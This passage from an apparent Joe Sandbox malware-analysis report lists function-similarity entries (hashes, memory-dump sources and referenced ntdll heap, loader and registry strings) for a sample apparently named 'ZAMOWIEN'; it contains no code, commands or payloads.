                                                                                  • Opcode ID: 4c942ee638b51fc724a7e489ae94561952253836b0df97b74aac2061291b9369
                                                                                  • Instruction ID: 7f991122959968719aaa3de8a09198337dd21b6e6a624fa87f9de24f3d712c9b
                                                                                  • Opcode Fuzzy Hash: 4c942ee638b51fc724a7e489ae94561952253836b0df97b74aac2061291b9369
                                                                                  • Instruction Fuzzy Hash: 1DB18CB2604342AFE711CF54C895B6BB7E9EB48768F41092DFA50DF260DB74E814CB92
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$@$\Registry\Machine\System\CurrentControlSet\Control\MUI\UILanguages
                                                                                  • API String ID: 0-1146358195
                                                                                  • Opcode ID: 12c5fb61149dfb97ba8d13032c801d996e7342d32d512a27129a551b21ff3db8
                                                                                  • Instruction ID: 98895675b79fdfe14a6d8a009a22ff60eeff98ffed5192afa9ef56df8692fe0a
                                                                                  • Opcode Fuzzy Hash: 12c5fb61149dfb97ba8d13032c801d996e7342d32d512a27129a551b21ff3db8
                                                                                  • Instruction Fuzzy Hash: C1A17E716093819FD711CF24C894B6BBBE9EF88758F41092DF984AB250DB34ED04CB96
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                                                                  • API String ID: 0-3870751728
                                                                                  • Opcode ID: b8477eebcbd64031417f3a141af1a8b959db6a0c530869dfaf7e51ded9cf2957
                                                                                  • Instruction ID: 52b64c8d6fd6956eee8604b64fbec9cdd1f2b84bdba1cc72f472b39c1db2f1fa
                                                                                  • Opcode Fuzzy Hash: b8477eebcbd64031417f3a141af1a8b959db6a0c530869dfaf7e51ded9cf2957
                                                                                  • Instruction Fuzzy Hash: 14912BB4E002059BEB14CFA9C884BEDBBB1FF88324F14856EE905AB351D7759842CF95
                                                                                  Strings
                                                                                  • TargetNtPath, xrefs: 377AB3AF
                                                                                  • GlobalizationUserSettings, xrefs: 377AB3B4
                                                                                  • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 377AB3AA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                  • API String ID: 0-505981995
                                                                                  • Opcode ID: fd092bec38167a2888132312a7ead00091b522de8ad984f2b367d4d5f193d7d1
                                                                                  • Instruction ID: ee05865cc00822a5fd1ad98fc4818c0a30bbec8771213b7027ca1fa8679261bd
                                                                                  • Opcode Fuzzy Hash: fd092bec38167a2888132312a7ead00091b522de8ad984f2b367d4d5f193d7d1
                                                                                  • Instruction Fuzzy Hash: 48618472D51229ABEB61DF54DC9CB99B7B8EB04710F4102E9E508AB360C774EE84CF90
                                                                                  Strings
                                                                                  • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3772E455
                                                                                  • HEAP[%wZ]: , xrefs: 3772E435
                                                                                  • HEAP: , xrefs: 3772E442
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                  • API String ID: 0-1340214556
                                                                                  • Opcode ID: 9d7af6cac80432de23b987f76dd1957826dc2be67379d243781e32120c03dfc8
                                                                                  • Instruction ID: 5a65688294b34a5928f9ff2ced631a5823835a0c9fa21097c85a42841df6e3fc
                                                                                  • Opcode Fuzzy Hash: 9d7af6cac80432de23b987f76dd1957826dc2be67379d243781e32120c03dfc8
                                                                                  • Instruction Fuzzy Hash: 6C515636605785EFE301CBA4C9A8F9ABBFCFF08710F0444A4E5509B692D778E941DB61
                                                                                  Strings
                                                                                  • LdrpCompleteMapModule, xrefs: 3773A39D
                                                                                  • minkernel\ntdll\ldrmap.c, xrefs: 3773A3A7
                                                                                  • Could not validate the crypto signature for DLL %wZ, xrefs: 3773A396
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                  • API String ID: 0-1676968949
                                                                                  • Opcode ID: 1629777ba232c23d2aaddafdd67dd32953cd096d643551f6a8e20b4064331d41
                                                                                  • Instruction ID: 3533f053d419e5c15b608357217c653e7ef6d34b8de75e92ae37672fe3771bc3
                                                                                  • Opcode Fuzzy Hash: 1629777ba232c23d2aaddafdd67dd32953cd096d643551f6a8e20b4064331d41
                                                                                  • Instruction Fuzzy Hash: A15153B4A01745DBF715CB6CC9A5B1AB7E5EF047A0F0006A5F8529F6D2DB39E800CB82
                                                                                  Strings
                                                                                  • Heap block at %p modified at %p past requested size of %Ix, xrefs: 3777D7B2
                                                                                  • HEAP[%wZ]: , xrefs: 3777D792
                                                                                  • HEAP: , xrefs: 3777D79F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                  • API String ID: 0-3815128232
                                                                                  • Opcode ID: 1ce6752144cb6078093fc8cb8f0a9468695b97143a164c2c32bedb16b6f22190
                                                                                  • Instruction ID: e6fc3922c372372b08fb35920c15c3d758ec107b08fbbeb1eac58a28edfc1884
                                                                                  • Opcode Fuzzy Hash: 1ce6752144cb6078093fc8cb8f0a9468695b97143a164c2c32bedb16b6f22190
                                                                                  • Instruction Fuzzy Hash: 665116791007D08EFB50CA29C85477277E2DF85398F508C8DE4C5EF685E62AE847DBA1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                  • API String ID: 0-1151232445
                                                                                  • Opcode ID: 710e2586eb64c489a8b36cd0fb136adb0150553b6f88be8d380c2fd2794af607
                                                                                  • Instruction ID: 4d126344580fc82257a7466c35ef761bd6e9c1b6f64605f7a94243c454cda7fc
                                                                                  • Opcode Fuzzy Hash: 710e2586eb64c489a8b36cd0fb136adb0150553b6f88be8d380c2fd2794af607
                                                                                  • Instruction Fuzzy Hash: CE4177B82003828FEB14CE39C0E4B7577E1DF01364F6548ADC8968F65ACA74E856DF22
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrtls.c, xrefs: 37741954
                                                                                  • LdrpAllocateTls, xrefs: 3774194A
                                                                                  • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 37741943
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                  • API String ID: 0-4274184382
                                                                                  • Opcode ID: 6783fa43e3190dc49244078eb2970438ffcd32ead9299d5c848377ecc02827c0
                                                                                  • Instruction ID: 4eb00f98218e1643d0704642a15ffed85d4f75ffe652e27ee62bd97c33639535
                                                                                  • Opcode Fuzzy Hash: 6783fa43e3190dc49244078eb2970438ffcd32ead9299d5c848377ecc02827c0
                                                                                  • Instruction Fuzzy Hash: 8C418BB5A00305AFDB15CFAACC91BADBBF5FF48314F008529E405AB601DB39A811CF51
                                                                                  Strings
                                                                                  • @, xrefs: 3775B2F0
                                                                                  • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3775B2B2
                                                                                  • GlobalFlag, xrefs: 3775B30F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                  • API String ID: 0-4192008846
                                                                                  • Opcode ID: ef102e4c38123c7ce0c6959fa054492152cc84a77896b4995580de8c80964bc9
                                                                                  • Instruction ID: 2fe1ab742fd4d1fface8b321d09e0b0937b3fb9553d212b327390422da9f326e
                                                                                  • Opcode Fuzzy Hash: ef102e4c38123c7ce0c6959fa054492152cc84a77896b4995580de8c80964bc9
                                                                                  • Instruction Fuzzy Hash: 5C316DB1E00209AFDB10DF95CC94BEEBBBDEF48754F440469E601BB160D7789A04CBA5
                                                                                  Strings
                                                                                  • LdrpInitializeTls, xrefs: 37741851
                                                                                  • minkernel\ntdll\ldrtls.c, xrefs: 3774185B
                                                                                  • DLL "%wZ" has TLS information at %p, xrefs: 3774184A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                  • API String ID: 0-931879808
                                                                                  • Opcode ID: 09b571fd7ac6c6c01806b026933ed74c0814c5b68eb11fc180eb4ed967a3dc37
                                                                                  • Instruction ID: 3f84f0396c25d93ad0b951e630c5f507c308167be18a1db5d99fed581594c80d
                                                                                  • Opcode Fuzzy Hash: 09b571fd7ac6c6c01806b026933ed74c0814c5b68eb11fc180eb4ed967a3dc37
                                                                                  • Instruction Fuzzy Hash: E831F871B50302BBEB20CB59CC85F5E77E9EF497A4F110429E402BF180EB74AD518BA1
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: RtlValidateHeap
                                                                                  • API String ID: 3446177414-1797218451
                                                                                  • Opcode ID: f3aff0f9c34edc6bfb41a7bfb75cf8a00fd6422861290045369a76aa3273a0ce
                                                                                  • Instruction ID: 751245a00bd109241fabd5fd078f1173e3a63a59e2735353411adbf02baeb5f9
                                                                                  • Opcode Fuzzy Hash: f3aff0f9c34edc6bfb41a7bfb75cf8a00fd6422861290045369a76aa3273a0ce
                                                                                  • Instruction Fuzzy Hash: 3E41077560438ADFDB02CFA4C4A07ADBB72FF85220F05865DD8216F390CB38A955EB95
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$@
                                                                                  • API String ID: 0-149943524
                                                                                  • Opcode ID: 38cf3a8306060d38eaa954f512ad0fb7a6b3aba426f0e66026a5871683bab56e
                                                                                  • Instruction ID: e1ed6371d24332138e1c1c2e13e8119c471a45cfbb872d4d49570e805087b4ab
                                                                                  • Opcode Fuzzy Hash: 38cf3a8306060d38eaa954f512ad0fb7a6b3aba426f0e66026a5871683bab56e
                                                                                  • Instruction Fuzzy Hash: 6632D1B41063118BD720CF14CAB073EB7EAEF88750F50491EF9959BA51E734E944CBA2
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID:
                                                                                  • API String ID: 3446177414-0
                                                                                  • Opcode ID: f3be753ad88bbbb8e10c6523adc89e531f61bb1fa1e52079cb734f8f4b44a36c
                                                                                  • Instruction ID: 539ea3fd26c14d9f25ae61fa3cca19d7a1b79130662e73bb60bf224dd5fb19b0
                                                                                  • Opcode Fuzzy Hash: f3be753ad88bbbb8e10c6523adc89e531f61bb1fa1e52079cb734f8f4b44a36c
                                                                                  • Instruction Fuzzy Hash: 9831D030312B06EFE7419F64CA60B9AFB66BF88754F001155E9009BE61DB74E821CFC6
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID:
                                                                                  • API String ID: 3446177414-0
                                                                                  • Opcode ID: 0b195b48bc7d0b603687f6e15d647e47c9c81e9a7ee156bc195a75d9730dcd9a
                                                                                  • Instruction ID: e9f0901174a4ef36659e71b463f58ffe911f2a7413716707352cdfe628bb60f5
                                                                                  • Opcode Fuzzy Hash: 0b195b48bc7d0b603687f6e15d647e47c9c81e9a7ee156bc195a75d9730dcd9a
                                                                                  • Instruction Fuzzy Hash: C511A7B1B14215EFEB058B68C989A5EB7B9EF48374F11016DE405EB340DB749D11CF94
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: `$`
                                                                                  • API String ID: 0-197956300
                                                                                  • Opcode ID: 6fdcb962b8def70188f23157c1bc2e236176fcf66154499c8901e01eec91a068
                                                                                  • Instruction ID: e7b16cc2b2cb2ce9ace7715ec33adf220cd6dd459af05f6588c1bfe8a3d1d2c4
                                                                                  • Opcode Fuzzy Hash: 6fdcb962b8def70188f23157c1bc2e236176fcf66154499c8901e01eec91a068
                                                                                  • Instruction Fuzzy Hash: 03C1DF7120A3429BE714CF24D881B9BBBE6AFC5368F054E3CF5959E290E779E504CB42
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$AddD
                                                                                  • API String ID: 0-2525844869
                                                                                  • Opcode ID: df79a183f31fa62e4cc2f576eef033f9a6c6d2fac641e4b038790a282bbb7afb
                                                                                  • Instruction ID: d2eae779ebe9eea8fb5ce9961a997caadeea7554855ad7fae8e7f5f399c32a7c
                                                                                  • Opcode Fuzzy Hash: df79a183f31fa62e4cc2f576eef033f9a6c6d2fac641e4b038790a282bbb7afb
                                                                                  • Instruction Fuzzy Hash: 9FA17DB6604340AFE315CF14C845FABB7EAFF84765F504A2EF9948A150E770E905CB62
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$MUI
                                                                                  • API String ID: 0-17815947
                                                                                  • Opcode ID: 56a5c2c9a1ddeb1fb748a3ec50d08a71d7ee37cdebc7086b0046eb099e968584
                                                                                  • Instruction ID: 31d052da21b83358fac97b1949a80a715511840703a4fc50b8b172fd37149b15
                                                                                  • Opcode Fuzzy Hash: 56a5c2c9a1ddeb1fb748a3ec50d08a71d7ee37cdebc7086b0046eb099e968584
                                                                                  • Instruction Fuzzy Hash: 865136B5E0025DAEDF11CFA4CC90AEFBBB9AF08794F10456AE511BB290D735AD05CB60
                                                                                  Strings
                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 377AB5C4
                                                                                  • RedirectedKey, xrefs: 377AB60E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                                  • API String ID: 0-1388552009
                                                                                  • Opcode ID: f7393918f1f1375d7680b918ad831c964efbe609ce1e86e90d477f937d2abd67
                                                                                  • Instruction ID: 6b7340eb5cc4db1f0f2e3ce3cbeeff2ee9cb9b600936b1ffa8f40cf54ae6f531
                                                                                  • Opcode Fuzzy Hash: f7393918f1f1375d7680b918ad831c964efbe609ce1e86e90d477f937d2abd67
                                                                                  • Instruction Fuzzy Hash: 836134B5C01219EFEF50CF94C898ADEBBB9FB08710F50416AE805EB210D774AA45DFA1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: $$$
                                                                                  • API String ID: 3446177414-233714265
                                                                                  • Opcode ID: 4f5890cc56df56ab186f1ad45d255e106aaa83d250df550aebdaeeeb3eda17e0
                                                                                  • Instruction ID: ad476307b1447d495da1b2ff2a1f9ede7973d5669c833db4d48077aa10235675
                                                                                  • Opcode Fuzzy Hash: 4f5890cc56df56ab186f1ad45d255e106aaa83d250df550aebdaeeeb3eda17e0
                                                                                  • Instruction Fuzzy Hash: 0B61F175A02749CFEB60CF64C6A0BDDB7F9FF44394F104469E1056BA80CB79A940CBA6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                  • API String ID: 0-118005554
                                                                                  • Opcode ID: 55ca5de8c4a5342d3be7c60dab1f7171ac8f91f83196ae18bc80ea16da11ba31
                                                                                  • Instruction ID: b684f6152769e6944edbaab3e9524a031e73977fbd282e670be1ed85ddab37b0
                                                                                  • Opcode Fuzzy Hash: 55ca5de8c4a5342d3be7c60dab1f7171ac8f91f83196ae18bc80ea16da11ba31
                                                                                  • Instruction Fuzzy Hash: AC31EFB52097419FD301CF68D858B2AB7E9EF89B28F000869FC548F395EB34E905CB52
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .Local\$@
                                                                                  • API String ID: 0-380025441
                                                                                  • Opcode ID: 88dca153f5591c33cb7cb295599d4d7c21c1eb8c5abec048c86eb6b92702821e
                                                                                  • Instruction ID: 431694d161bfa4bf340e0a377492c2d797c8e88d262bfdb64aa72f5f306f3b79
                                                                                  • Opcode Fuzzy Hash: 88dca153f5591c33cb7cb295599d4d7c21c1eb8c5abec048c86eb6b92702821e
                                                                                  • Instruction Fuzzy Hash: E23191B6549301AFD311CF28C980A5BBBE8FB89664F00092EF9948B250D734DD08CFA3
                                                                                  Strings
                                                                                  • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 3774289F
                                                                                  • RtlpInitializeAssemblyStorageMap, xrefs: 3774289A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                  • API String ID: 0-2653619699
                                                                                  • Opcode ID: 722f6e44cfd09e6508e68713914326f230e251c8630f143f383259c2665e2cbd
                                                                                  • Instruction ID: bd49c21abe78a5baa7d089d0126316a168ef640d9d5b32c864ad5adfbba26eba
                                                                                  • Opcode Fuzzy Hash: 722f6e44cfd09e6508e68713914326f230e251c8630f143f383259c2665e2cbd
                                                                                  • Instruction Fuzzy Hash: 7F110672B00204ABE7158E48CD40F6F76EDEB89B60F21843DB904DF244DA74DD008BA5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @[|7@[|7
                                                                                  • API String ID: 0-3259368316
                                                                                  • Opcode ID: efe8cef68db28fc87a60efe72a46d7c07c209dff040b0ca35501a562a3f42aec
